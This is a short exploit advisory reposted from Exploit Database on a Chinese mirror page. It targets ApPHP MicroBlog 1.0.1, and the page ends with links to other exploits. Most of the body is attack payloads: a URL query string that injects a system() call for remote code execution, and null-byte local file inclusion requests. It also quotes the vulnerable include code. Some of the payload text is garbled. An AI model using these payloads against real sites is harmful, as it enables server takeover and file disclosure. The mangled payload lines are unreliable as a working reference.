ApPHP MicroBlog 1.0.1 – Multiple Vulnerabilities

Exploit Database
11 阅读

作者： JIKO

日期： 2014-04-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33030/

----------[exploit Debut]
[Multiple Vulnerability]
----------[Script Info]
 
Moi : JIKO
Site: No-exploit.Com

 
----------[Script Info]
 
Site: http://www.apphp.com
Download: http://www.apphp.com/downloads_free/php_microblog_101.zip
 
----------[exploit Info]
 
~[RCE]
http://path/index.php?jiko);system((dir)=/
~[LFI]
http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)

if (($page != "") && file_exists("page/" . $page . ".php")) {
include_once("page/" . $page . 

".php");
} else if (($admin != "") && 

file_exists("admin/" . $admin . ".php")) {
include_once("admin/" . $admin 

. ".php");
} 
----------[exploit Fin]

last Exploits
ApPHP MicroBlog 1.0.1 – Multiple Vulnerabilities的更多信息

SourceBans 1.4.8 – SQL Injection / Local File Inclusion Injection：
TestLink 1.9.20 – Unrestricted File Upload (Authenticated)：
projectSend r1605 – Stored XSS：
PHP Flat File Guestbook 1.0 – ‘ffgb_admin.php’ Remote File Inclusion：
WebsitePanel – ‘ReturnUrl’ Open Redirection：
School Log Management System 1.0 – ‘username’ SQL Injection / Remote Code Execution：
Student Record System 1.0 – ‘cid’ SQLi (Authenticated)：
TP-Link wireless router Archer C1200 – Cross-Site Scripting：